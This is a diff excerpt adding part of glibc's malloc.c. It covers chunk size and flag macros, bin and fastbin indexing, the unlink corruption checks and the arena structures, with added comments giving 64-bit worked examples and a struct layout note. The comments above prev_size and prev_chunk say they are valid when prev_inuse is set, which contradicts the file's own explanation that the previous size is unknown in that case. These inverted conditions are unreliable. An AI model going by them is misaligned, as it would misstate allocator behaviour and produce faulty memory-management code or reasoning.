+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    The P (PREV_INUSE) bit, stored in the unused low-order bit of the
+    chunk size (which is always a multiple of two words), is an in-use
+    bit for the *previous* chunk.  If that bit is *clear*, then the
+    word before the current chunk size contains the previous chunk
+    size, and can be used to find the front of the previous chunk.
+    The very first chunk allocated always has this bit set,
+    preventing access to non-existent (or non-owned) memory. If
+    prev_inuse is set for any given chunk, then you CANNOT determine
+    the size of the previous chunk, and might even get a memory
+    addressing fault when trying to do so.
+
+    The A (NON_MAIN_ARENA) bit is cleared for chunks on the initial,
+    main arena, described by the main_arena variable.  When additional
+    threads are spawned, each thread receives its own arena (up to a
+    configurable limit, after which arenas are reused for multiple
+    threads), and the chunks in these arenas have the A bit set.  To
+    find the arena for a chunk on such a non-main arena, heap_for_ptr
+    performs a bit mask operation and indirection through the ar_ptr
+    member of the per-heap header heap_info (see arena.c).
+
+    Note that the `foot' of the current chunk is actually represented
+    as the prev_size of the NEXT chunk. This makes it easier to
+    deal with alignments etc but can be very confusing when trying
+    to extend or adapt this code.
+
+    The three exceptions to all this are:
+
+     1. The special chunk `top' doesn't bother using the
+	trailing size field since there is no next contiguous chunk
+	that would have to index off it. After initialization, `top'
+	is forced to always exist.  If it would become less than
+	MINSIZE bytes long, it is replenished.
+
+     2. Chunks allocated via mmap, which have the second-lowest-order
+	bit M (IS_MMAPPED) set in their size fields.  Because they are
+	allocated one-by-one, each must contain its own trailing size
+	field.  If the M bit is set, the other bits are ignored
+	(because mmapped chunks are neither in an arena, nor adjacent
+	to a freed chunk).  The M bit is also used for chunks which
+	originally came from a dumped heap via malloc_set_state in
+	hooks.c.
+
+     3. Chunks in fastbins are treated as allocated chunks from the
+	point of view of the chunk allocator.  They are consolidated
+	with their neighbors only in bulk, in malloc_consolidate.
+*/
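+
+/*
+   Worked example (added for clarity; assumes a 64-bit build where
+   SIZE_SZ == 8 and MALLOC_ALIGNMENT == 16, the common glibc
+   configuration).  A call to malloc(24):
+
+     - request2size(24) = (24 + 8 + 15) & ~15 = 32 (0x20), the chunk size.
+     - The size field typically reads 0x21, i.e. 0x20 | PREV_INUSE.
+     - chunk2mem() returns chunk + 16, and the 24 usable bytes run from
+       mem up to and including the prev_size field of the next chunk,
+       which is free for application data while this chunk is in use.
+*/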
+
+/*
+  ---------- Size and alignment checks and conversions ----------
+*/
+
+/* conversion from malloc headers to user pointers, and back */
+
+#define chunk2mem(p)   ((void*)((char*)(p) + 2*SIZE_SZ))
+#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
+
+/* The smallest possible chunk */
+#define MIN_CHUNK_SIZE        (offsetof(struct malloc_chunk, fd_nextsize))
+
+/* The smallest size we can malloc is an aligned minimal chunk */
+
+#define MINSIZE  \
+  (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))
+
+/* Check if m has acceptable alignment */
+
+#define aligned_OK(m)  (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
+
+#define misaligned_chunk(p) \
+  ((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
+   & MALLOC_ALIGN_MASK)
+
+
+/*
+   Check if a request is so large that it would wrap around zero when
+   padded and aligned. To simplify some other code, the bound is made
+   low enough so that adding MINSIZE will also not wrap around zero.
+ */
+
+#define REQUEST_OUT_OF_RANGE(req)                                 \
+  ((unsigned long) (req) >=						      \
+   (unsigned long) (INTERNAL_SIZE_T) (-2 * MINSIZE))
+
+/* pad request bytes into a usable size -- internal version */
+
+#define request2size(req)                                         \
+  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)  ?             \
+   MINSIZE :                                                      \
+   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
+
+/*  Same, except also perform argument check */
+
+#define checked_request2size(req, sz)                             \
+  if (REQUEST_OUT_OF_RANGE (req)) {					      \
+      __set_errno (ENOMEM);						      \
+      return 0;								      \
+    }									      \
+  (sz) = request2size (req);
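+
+/*
+   Worked examples (illustrative addition; 64-bit build assumed, so
+   SIZE_SZ == 8, MALLOC_ALIGN_MASK == 15 and MINSIZE == 32):
+
+     request2size(0)   -> 32   (below MINSIZE, rounded up to it)
+     request2size(24)  -> 32   (24 + 8 fits in one aligned unit)
+     request2size(25)  -> 48   (25 + 8 = 33 no longer fits; next multiple of 16)
+     request2size(100) -> 112  ((100 + 8 + 15) & ~15)
+
+   Only SIZE_SZ bytes of header overhead are added because the prev_size
+   slot of the following chunk doubles as usable space while this chunk
+   is in use.
+*/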
+
+/*
+   --------------- Physical chunk operations ---------------
+ */
+
+
+/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use */
+#define PREV_INUSE 0x1
+
+/* extract inuse bit of previous chunk */
+#define prev_inuse(p)       ((p)->mchunk_size & PREV_INUSE)
+
+
+/* size field is or'ed with IS_MMAPPED if the chunk was obtained with mmap() */
+#define IS_MMAPPED 0x2
+
+/* check for mmap()'ed chunk */
+#define chunk_is_mmapped(p) ((p)->mchunk_size & IS_MMAPPED)
+
+
+/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained
+   from a non-main arena.  This is only set immediately before handing
+   the chunk to the user, if necessary.  */
+#define NON_MAIN_ARENA 0x4
+
+/* Check for chunk from main arena.  */
+#define chunk_main_arena(p) (((p)->mchunk_size & NON_MAIN_ARENA) == 0)
+
+/* Mark a chunk as not being on the main arena.  */
+#define set_non_main_arena(p) ((p)->mchunk_size |= NON_MAIN_ARENA)
+
+
+/*
+   Bits to mask off when extracting size
+
+   Note: IS_MMAPPED is intentionally not masked off from size field in
+   macros for which mmapped chunks should never be seen. This should
+   cause helpful core dumps to occur if it is tried by accident by
+   people extending or adapting this malloc.
+ */
+#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
+
+/* Get size, ignoring use bits */
+#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))
+
+/* Like chunksize, but do not mask SIZE_BITS.  */
+#define chunksize_nomask(p)         ((p)->mchunk_size)
+
+/* Ptr to next physical malloc_chunk. */
+#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))
+
+/* Size of the chunk below P.  Only valid if prev_inuse (P).  */
+#define prev_size(p) ((p)->mchunk_prev_size)
+
+/* Set the size of the chunk below P.  Only valid if prev_inuse (P).  */
+#define set_prev_size(p, sz) ((p)->mchunk_prev_size = (sz))
+
+/* Ptr to previous physical malloc_chunk.  Only valid if prev_inuse (P).  */
+#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - prev_size (p)))
+
+/* Treat space at ptr + offset as a chunk */
+#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))
+
+/* extract p's inuse bit */
+#define inuse(p)							      \
+  ((((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size) & PREV_INUSE)
+
+/* set/clear chunk as being inuse without otherwise disturbing */
+#define set_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size |= PREV_INUSE
+
+#define clear_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size &= ~(PREV_INUSE)
+
+
+/* check/set/clear inuse bits in known places */
+#define inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size & PREV_INUSE)
+
+#define set_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size |= PREV_INUSE)
+
+#define clear_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size &= ~(PREV_INUSE))
+
+
+/* Set size at head, without disturbing its use bit */
+#define set_head_size(p, s)  ((p)->mchunk_size = (((p)->mchunk_size & SIZE_BITS) | (s)))
+
+/* Set size/use field */
+#define set_head(p, s)       ((p)->mchunk_size = (s))
+
+/* Set size at footer (only when chunk is not in use) */
+#define set_foot(p, s)       (((mchunkptr) ((char *) (p) + (s)))->mchunk_prev_size = (s))
+
+
+#pragma GCC poison mchunk_size
+#pragma GCC poison mchunk_prev_size
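+
+/* Illustrative sketch (added; not compiled and not part of glibc): how the
+   macros above compose to walk the physically adjacent chunks of a heap.
+   'start' and 'top' are assumed to be a valid chunk and the arena's top
+   chunk; real callers would obtain them from an arena.  */
+#if 0
+static void
+example_walk_chunks (mchunkptr start, mchunkptr top)
+{
+  for (mchunkptr p = start; p != top; p = next_chunk (p))
+    {
+      size_t sz = chunksize (p);          /* size with the flag bits masked off   */
+      int used = inuse (p);               /* PREV_INUSE bit of the *next* chunk   */
+      int mapped = chunk_is_mmapped (p);  /* should be 0 for chunks inside a heap */
+      (void) sz; (void) used; (void) mapped;
+    }
+}
+#endif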
+
+/*
+   -------------------- Internal data structures --------------------
+
+   All internal state is held in an instance of malloc_state defined
+   below. There are no other static variables, except in two optional
+   cases:
+ * If USE_MALLOC_LOCK is defined, the mALLOC_MUTEx declared above.
+ * If mmap doesn't support MAP_ANONYMOUS, a dummy file descriptor
+     for mmap.
+
+   Beware of lots of tricks that minimize the total bookkeeping space
+   requirements. The result is a little over 1K bytes (for 4-byte
+   pointers and size_t).
+ */
+
+/*
+   Bins
+
+    An array of bin headers for free chunks. Each bin is doubly
+    linked.  The bins are approximately proportionally (log) spaced.
+    There are a lot of these bins (128). This may look excessive, but
+    works very well in practice.  Most bins hold sizes that are
+    unusual as malloc request sizes, but are more usual for fragments
+    and consolidated sets of chunks, which is what these bins hold, so
+    they can be found quickly.  All procedures maintain the invariant
+    that no consolidated chunk physically borders another one, so each
+    chunk in a list is known to be preceded and followed by either
+    inuse chunks or the ends of memory.
+
+    Chunks in bins are kept in size order, with ties going to the
+    approximately least recently used chunk. Ordering isn't needed
+    for the small bins, which all contain the same-sized chunks, but
+    facilitates best-fit allocation for larger chunks. These lists
+    are just sequential. Keeping them in order almost never requires
+    enough traversal to warrant using fancier ordered data
+    structures.
+
+    Chunks of the same size are linked with the most
+    recently freed at the front, and allocations are taken from the
+    back.  This results in LRU (FIFO) allocation order, which tends
+    to give each chunk an equal opportunity to be consolidated with
+    adjacent freed chunks, resulting in larger free chunks and less
+    fragmentation.
+
+    To simplify use in double-linked lists, each bin header acts
+    as a malloc_chunk. This avoids special-casing for headers.
+    But to conserve space and improve locality, we allocate
+    only the fd/bk pointers of bins, and then use repositioning tricks
+    to treat these as the fields of a malloc_chunk*.
+ */
+
+typedef struct malloc_chunk *mbinptr;
+
+/* addressing -- note that bin_at(0) does not exist */
+#define bin_at(m, i) \
+  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))			      \
+             - offsetof (struct malloc_chunk, fd))
+
+/* analog of ++bin */
+#define next_bin(b)  ((mbinptr) ((char *) (b) + (sizeof (mchunkptr) << 1)))
+
+/* Reminders about list directionality within bins */
+#define first(b)     ((b)->fd)
+#define last(b)      ((b)->bk)
+
+/* Take a chunk off a bin list */
+#define unlink(AV, P, BK, FD) {                                            \
+    if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))      \
+      malloc_printerr (check_action, "corrupted size vs. prev_size", P, AV);  \
+    FD = P->fd;								      \
+    BK = P->bk;								      \
+    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))		      \
+      malloc_printerr (check_action, "corrupted double-linked list", P, AV);  \
+    else {								      \
+        FD->bk = BK;							      \
+        BK->fd = FD;							      \
+        if (!in_smallbin_range (chunksize_nomask (P))			      \
+            && __builtin_expect (P->fd_nextsize != NULL, 0)) {		      \
+	    if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)	      \
+		|| __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))    \
+	      malloc_printerr (check_action,				      \
+			       "corrupted double-linked list (not small)",    \
+			       P, AV);					      \
+            if (FD->fd_nextsize == NULL) {				      \
+                if (P->fd_nextsize == P)				      \
+                  FD->fd_nextsize = FD->bk_nextsize = FD;		      \
+                else {							      \
+                    FD->fd_nextsize = P->fd_nextsize;			      \
+                    FD->bk_nextsize = P->bk_nextsize;			      \
+                    P->fd_nextsize->bk_nextsize = FD;			      \
+                    P->bk_nextsize->fd_nextsize = FD;			      \
+                  }							      \
+              } else {							      \
+                P->fd_nextsize->bk_nextsize = P->bk_nextsize;		      \
+                P->bk_nextsize->fd_nextsize = P->fd_nextsize;		      \
+              }								      \
+          }								      \
+      }									      \
+}
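+
+/*
+   Illustrative note (added): for a well-formed list the effect of
+   unlink(AV, P, BK, FD) is simply
+
+       FD = P->fd;  BK = P->bk;
+       FD->bk = BK; BK->fd = FD;
+
+   i.e. P's neighbours are pointed at each other.  The two
+   __builtin_expect checks guard this: the size/prev_size comparison
+   catches a chunk whose size field no longer matches the footer stored
+   in the next chunk, and the FD->bk != P || BK->fd != P test refuses to
+   unlink a chunk whose list neighbours do not point back at it.
+*/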
+
+/*
+   Indexing
+
+    Bins for sizes < 512 bytes contain chunks of all the same size, spaced
+    8 bytes apart. Larger bins are approximately logarithmically spaced:
+
+    64 bins of size       8
+    32 bins of size      64
+    16 bins of size     512
+     8 bins of size    4096
+     4 bins of size   32768
+     2 bins of size  262144
+     1 bin  of size what's left
+
+    There is actually a little bit of slop in the numbers in bin_index
+    for the sake of speed. This makes no difference elsewhere.
+
+    The bins top out around 1MB because we expect to service large
+    requests via mmap.
+
+    Bin 0 does not exist.  Bin 1 is the unordered list; if that would be
+    a valid chunk size the small bins are bumped up one.
+ */
+
+#define NBINS             128
+#define NSMALLBINS         64
+#define SMALLBIN_WIDTH    MALLOC_ALIGNMENT
+#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > 2 * SIZE_SZ)
+#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)
+
+#define in_smallbin_range(sz)  \
+  ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE)
+
+#define smallbin_index(sz) \
+  ((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\
+   + SMALLBIN_CORRECTION)
+
+#define largebin_index_32(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 38) ?  56 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index_32_big(sz)                                            \
+  (((((unsigned long) (sz)) >> 6) <= 45) ?  49 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+// XXX It remains to be seen whether it is good to keep the widths of
+// XXX the buckets the same or whether it should be scaled by a factor
+// XXX of two as well.
+#define largebin_index_64(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 48) ?  48 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index(sz) \
+  (SIZE_SZ == 8 ? largebin_index_64 (sz)                                     \
+   : MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz)                     \
+   : largebin_index_32 (sz))
+
+#define bin_index(sz) \
+  ((in_smallbin_range (sz)) ? smallbin_index (sz) : largebin_index (sz))
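+
+/*
+   Worked examples (illustrative addition; 64-bit build assumed, so
+   SIZE_SZ == 8, SMALLBIN_WIDTH == 16 and MIN_LARGE_SIZE == 1024):
+
+     bin_index(0x20)   -> smallbin_index(0x20)  = 0x20 >> 4  = 2
+     bin_index(0x3f0)  -> smallbin_index(0x3f0) = 0x3f0 >> 4 = 63
+     bin_index(0x400)  -> largebin_index_64(0x400)  = 48 + (0x400 >> 6)  = 64
+     bin_index(0x1000) -> largebin_index_64(0x1000) = 91 + (0x1000 >> 9) = 99
+
+   So bins 2..63 are the small bins (one chunk size each) and bin 64 is
+   the first large bin.
+*/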
+
+
+/*
+   Unsorted chunks
+
+    All remainders from chunk splits, as well as all returned chunks,
+    are first placed in the "unsorted" bin. They are then placed
+    in regular bins after malloc gives them ONE chance to be used before
+    binning. So, basically, the unsorted_chunks list acts as a queue,
+    with chunks being placed on it in free (and malloc_consolidate),
+    and taken off (to be either used or placed in bins) in malloc.
+
+    The NON_MAIN_ARENA flag is never set for unsorted chunks, so it
+    does not have to be taken into account in size comparisons.
+ */
+
+/* The otherwise unindexable 1-bin is used to hold unsorted chunks. */
+#define unsorted_chunks(M)          (bin_at (M, 1))
+
+/*
+   Top
+
+    The top-most available chunk (i.e., the one bordering the end of
+    available memory) is treated specially. It is never included in
+    any bin, is used only if no other chunk is available, and is
+    released back to the system if it is very large (see
+    M_TRIM_THRESHOLD).  Because top initially
+    points to its own bin with initial zero size, thus forcing
+    extension on the first malloc request, we avoid having any special
+    code in malloc to check whether it even exists yet. But we still
+    need to do so when getting memory from system, so we make
+    initial_top treat the bin as a legal but unusable chunk during the
+    interval between initialization and the first call to
+    sysmalloc. (This is somewhat delicate, since it relies on
+    the 2 preceding words to be zero during this interval as well.)
+ */
+
+/* Conveniently, the unsorted bin can be used as dummy top on first call */
+#define initial_top(M)              (unsorted_chunks (M))
+
+/*
+   Binmap
+
+    To help compensate for the large number of bins, a one-level index
+    structure is used for bin-by-bin searching.  `binmap' is a
+    bitvector recording whether bins are definitely empty so they can
+    be skipped over during traversals.  The bits are NOT always
+    cleared as soon as bins are empty, but instead only
+    when they are noticed to be empty during traversal in malloc.
+ */
+
+/* Conservatively use 32 bits per map word, even if on 64bit system */
+#define BINMAPSHIFT      5
+#define BITSPERMAP       (1U << BINMAPSHIFT)
+#define BINMAPSIZE       (NBINS / BITSPERMAP)
+
+#define idx2block(i)     ((i) >> BINMAPSHIFT)
+#define idx2bit(i)       ((1U << ((i) & ((1U << BINMAPSHIFT) - 1))))
+
+#define mark_bin(m, i)    ((m)->binmap[idx2block (i)] |= idx2bit (i))
+#define unmark_bin(m, i)  ((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))
+#define get_binmap(m, i)  ((m)->binmap[idx2block (i)] & idx2bit (i))
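+
+/*
+   Worked example (illustrative addition): with BINMAPSHIFT == 5 each
+   binmap word tracks 32 bins and BINMAPSIZE == 128 / 32 == 4.  For bin
+   index 99:  idx2block(99) = 99 >> 5 = 3 and idx2bit(99) =
+   1 << (99 & 31) = 1 << 3, so mark_bin(m, 99) sets bit 3 of m->binmap[3].
+*/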
+
+/*
+   Fastbins
+
+    An array of lists holding recently freed small chunks.  Fastbins
+    are not doubly linked.  It is faster to single-link them, and
+    since chunks are never removed from the middles of these lists,
+    double linking is not necessary. Also, unlike regular bins, they
+    are not even processed in FIFO order (they use faster LIFO) since
+    ordering doesn't much matter in the transient contexts in which
+    fastbins are normally used.
+
+    Chunks in fastbins keep their inuse bit set, so they cannot
+    be consolidated with other free chunks. malloc_consolidate
+    releases all chunks in fastbins and consolidates them with
+    other free chunks.
+ */
+
+typedef struct malloc_chunk *mfastbinptr;
+#define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx])
+
+/* offset 2 to use otherwise unindexable first 2 bins */
+#define fastbin_index(sz) \
+  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
+
+
+/* The maximum fastbin request size we support */
+#define MAX_FAST_SIZE     (80 * SIZE_SZ / 4)
+
+#define NFASTBINS  (fastbin_index (request2size (MAX_FAST_SIZE)) + 1)
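+
+/*
+   Worked example (illustrative addition; 64-bit build assumed, so
+   SIZE_SZ == 8):  MAX_FAST_SIZE = 80 * 8 / 4 = 160, request2size(160) =
+   176 (0xb0), and fastbin_index(0xb0) = (0xb0 >> 4) - 2 = 9, giving
+   NFASTBINS == 10.  The smallest chunk, 0x20 bytes, lands in
+   fastbin_index(0x20) = 0, so fastbinsY[0..9] cover chunk sizes
+   0x20, 0x30, ..., 0xb0.
+*/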
+
+/*
+   FASTBIN_CONSOLIDATION_THRESHOLD is the size of a chunk in free()
+   that triggers automatic consolidation of possibly-surrounding
+   fastbin chunks. This is a heuristic, so the exact value should not
+   matter too much. It is defined at half the default trim threshold as a
+   compromise heuristic to only attempt consolidation if it is likely
+   to lead to trimming. However, it is not dynamically tunable, since
+   consolidation reduces fragmentation surrounding large chunks even
+   if trimming is not used.
+ */
+
+#define FASTBIN_CONSOLIDATION_THRESHOLD  (65536UL)
+
+/*
+   Since the lowest 2 bits in max_fast don't matter in size comparisons,
+   they are used as flags.
+ */
+
+/*
+   FASTCHUNKS_BIT held in max_fast indicates that there are probably
+   some fastbin chunks. It is set true on entering a chunk into any
+   fastbin, and cleared only in malloc_consolidate.
+
+   The truth value is inverted so that have_fastchunks will be true
+   upon startup (since statics are zero-filled), simplifying
+   initialization checks.
+ */
+
+#define FASTCHUNKS_BIT        (1U)
+
+#define have_fastchunks(M)     (((M)->flags & FASTCHUNKS_BIT) == 0)
+#define clear_fastchunks(M)    catomic_or (&(M)->flags, FASTCHUNKS_BIT)
+#define set_fastchunks(M)      catomic_and (&(M)->flags, ~FASTCHUNKS_BIT)
+
+/*
+   NONCONTIGUOUS_BIT indicates that MORECORE does not return contiguous
+   regions.  Otherwise, contiguity is exploited in merging together,
+   when possible, results from consecutive MORECORE calls.
+
+   The initial value comes from MORECORE_CONTIGUOUS, but is
+   changed dynamically if mmap is ever used as an sbrk substitute.
+ */
+
+#define NONCONTIGUOUS_BIT     (2U)
+
+#define contiguous(M)          (((M)->flags & NONCONTIGUOUS_BIT) == 0)
+#define noncontiguous(M)       (((M)->flags & NONCONTIGUOUS_BIT) != 0)
+#define set_noncontiguous(M)   ((M)->flags |= NONCONTIGUOUS_BIT)
+#define set_contiguous(M)      ((M)->flags &= ~NONCONTIGUOUS_BIT)
+
+/* ARENA_CORRUPTION_BIT is set if a memory corruption was detected on the
+   arena.  Such an arena is no longer used to allocate chunks.  Chunks
+   allocated in that arena before detecting corruption are not freed.  */
+
+#define ARENA_CORRUPTION_BIT (4U)
+
+#define arena_is_corrupt(A)	(((A)->flags & ARENA_CORRUPTION_BIT))
+#define set_arena_corrupt(A)	((A)->flags |= ARENA_CORRUPTION_BIT)
+
+/*
+   Set value of max_fast.
+   Use impossibly small value if 0.
+   Precondition: there are no existing fastbin chunks.
+   Setting the value clears fastchunk bit but preserves noncontiguous bit.
+ */
+
+#define set_max_fast(s) \
+  global_max_fast = (((s) == 0)						      \
+                     ? SMALLBIN_WIDTH : ((s + SIZE_SZ) & ~MALLOC_ALIGN_MASK))
+#define get_max_fast() global_max_fast
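+
+/*
+   Worked example (illustrative addition; 64-bit build assumed, and
+   assuming the usual DEFAULT_MXFAST of 64 * SIZE_SZ / 4 = 128 defined
+   earlier in this file):  set_max_fast(128) stores
+   (128 + 8) & ~15 = 128 in global_max_fast, so by default chunks of up
+   to 0x80 bytes are eligible for the fastbins.
+*/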
+
+
+/*
+   ----------- Internal state representation and initialization -----------
+ */
+
+struct malloc_state
+{
+  /* Serialize access.  */
+  __libc_lock_define (, mutex);
+
+  /* Flags (formerly in max_fast).  */
+  int flags;
+
+  /* Fastbins */
+  mfastbinptr fastbinsY[NFASTBINS];
+
+  /* Base of the topmost chunk -- not otherwise kept in a bin */
+  mchunkptr top;
+
+  /* The remainder from the most recent split of a small request */
+  mchunkptr last_remainder;
+
+  /* Normal bins packed as described above */
+  mchunkptr bins[NBINS * 2 - 2];
+
+  /* Bitmap of bins */
+  unsigned int binmap[BINMAPSIZE];
+
+  /* Linked list */
+  struct malloc_state *next;
+
+  /* Linked list for free arenas.  Access to this field is serialized
+     by free_list_lock in arena.c.  */
+  struct malloc_state *next_free;
+
+  /* Number of threads attached to this arena.  0 if the arena is on
+     the free list.  Access to this field is serialized by
+     free_list_lock in arena.c.  */
+  INTERNAL_SIZE_T attached_threads;
+
+  /* Memory allocated from the system in this arena.  */
+  INTERNAL_SIZE_T system_mem;
+  INTERNAL_SIZE_T max_system_mem;
+};
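+
+/* Layout note (added for clarity; assumes a 64-bit build where the mutex
+   and flags fields are 4-byte ints and NFASTBINS == 10): fastbinsY then
+   sits at offset 0x08, top at offset 0x58 and bins at offset 0x68 of
+   struct malloc_state, which is handy to keep in mind when inspecting
+   main_arena in a debugger.  */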
+
+struct malloc_par
+{
+  /* Tunable parameters */
+  unsigned long trim_threshold;
+  INTERNAL_SIZE_T top_pad;
+  INTERNAL_SIZE_T mmap_threshold;
+  INTERNAL_SIZE_T arena_test;
+  INTERNAL_SIZE_T arena_max;
+
+  /* Memory map support */
+  int n_mmaps;
+  int n_mmaps_max;
+  int max_n_mmaps;
+  /* the mmap_threshold is dynamic, until the user sets
+     it manually, at which point we need to disable any
+     dynamic behavior. */
+  int no_dyn_threshold;
+
+  /* Statistics */
+  INTERNAL_SIZE_T mmapped_mem;
+  INTERNAL_SIZE_T max_mmapped_mem;
+
+  /* First address handed out by MORECORE/sbrk.  */
+  char *sbrk_base;
+
+#if USE_TCACHE
+  /* Maximum number of buckets to use.  */
+  size_t tcache_bins;
+  size_t tcache_max_bytes;
+  /* Maximum number of chunks in each bucket.  */
+  size_t tcache_count;
+  /* Maximum number of chunks to remove from the unsorted list, which
+     aren't used to prefill the cache.  */
+  size_t tcache_unsorted_limit;
+#endif
+};
+
+/* There are several instances of this struct ("arenas") in this
+   malloc.  If you are adapting this malloc in a way that does NOT use
+   a static or mmapped malloc_state, you MUST explicitly zero-fill it
+   before using. This malloc relies on the property that malloc_state
+   is initialized to all zeroes (as is true of C statics).  */
+
+static struct malloc_state main_arena =
+{
+  .mutex = _LIBC_LOCK_INITIALIZER,
+  .next = &main_arena,
+  .attached_threads = 1
+};
+
+/* These variables are used for undumping support.  Chunks are marked
+   as using mmap, but we leave them alone if they fall into this
+   range.  NB: The chunk size for these chunks only includes the
+   initial size field (of SIZE_SZ bytes), there is no trailing size
+   field (unlike with regular mmapped chunks).  */
+static mchunkptr dumped_main_arena_start; /* Inclusive.  */
+static mchunkptr dumped_main_arena_end;   /* Exclusive.  */
+
+/* True if the pointer falls into the dumped arena.  Use this after
+   chunk_is_mmapped indicates a chunk is mmapped.  */
+#define DUMPED_MAIN_ARENA_CHUNK(p) \
+  ((p) >= dumped_main_arena_start && (p) < dumped_main_arena_end)
+
+/* There is only one instance of the malloc parameters.  */
+
+static struct malloc_par mp_ =
+{
+  .top_pad = DEFAULT_TOP_PAD,
+  .n_mmaps_max = DEFAULT_MMAP_MAX,
+  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
+  .trim_threshold = DEFAULT_TRIM_THRESHOLD,
+#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))
+  .arena_test = NARENAS_FROM_NCORES (1)
+#if USE_TCACHE
+  ,
+  .tcache_count = TCACHE_FILL_COUNT,
+  .tcache_bins = TCACHE_MAX_BINS,
+  .tcache_max_bytes = tidx2usize (TCACHE_MAX_BINS-1),
+  .tcache_unsorted_limit = 0 /* No limit.  */
+#endif
+};
+
+/* Maximum size of memory handled in fastbins.  */
+static INTERNAL_SIZE_T global_max_fast;
+
+/*
+   Initialize a malloc_state struct.
+
+   This is called only from within malloc_consolidate, which needs to
+   be called in the same contexts anyway.  It is never called directly
+   outside of malloc_consolidate because some optimizing compilers try
+   to inline it at all call points, which turns out not to be an
+   optimization at all. (Inlining it in malloc_consolidate is fine though.)
+ */
+
+static void
+malloc_init_state (mstate av)
+{
+  int i;
+  mbinptr bin;
+
+  /* Establish circular links for normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      bin = bin_at (av, i);
+      bin->fd = bin->bk = bin;
+    }
+
+#if MORECORE_CONTIGUOUS
+  if (av != &main_arena)
+#endif
+  set_noncontiguous (av);
+  if (av == &main_arena)
+    set_max_fast (DEFAULT_MXFAST);
+  av->flags |= FASTCHUNKS_BIT;
+
+  av->top = initial_top (av);
+}
+
+/*
+   Other internal utilities operating on mstates
+ */
+
+static void *sysmalloc (INTERNAL_SIZE_T, mstate);
+static int      systrim (size_t, mstate);
+static void     malloc_consolidate (mstate);
+
+
+/* -------------- Early definitions for debugging hooks ---------------- */
+
+/* Define and initialize the hook variables.  These weak definitions must
+   appear before any use of the variables in a function (arena.c uses one).  */
+#ifndef weak_variable
+/* In GNU libc we want the hook variables to be weak definitions to
+   avoid a problem with Emacs.  */
+# define weak_variable weak_function
+#endif
+
+/* Forward declarations.  */
+static void *malloc_hook_ini (size_t sz,
+                              const void *caller) __THROW;
+static void *realloc_hook_ini (void *ptr, size_t sz,
+                               const void *caller) __THROW;
+static void *memalign_hook_ini (size_t alignment, size_t sz,
+                                const void *caller) __THROW;
+
+#if HAVE_MALLOC_INIT_HOOK
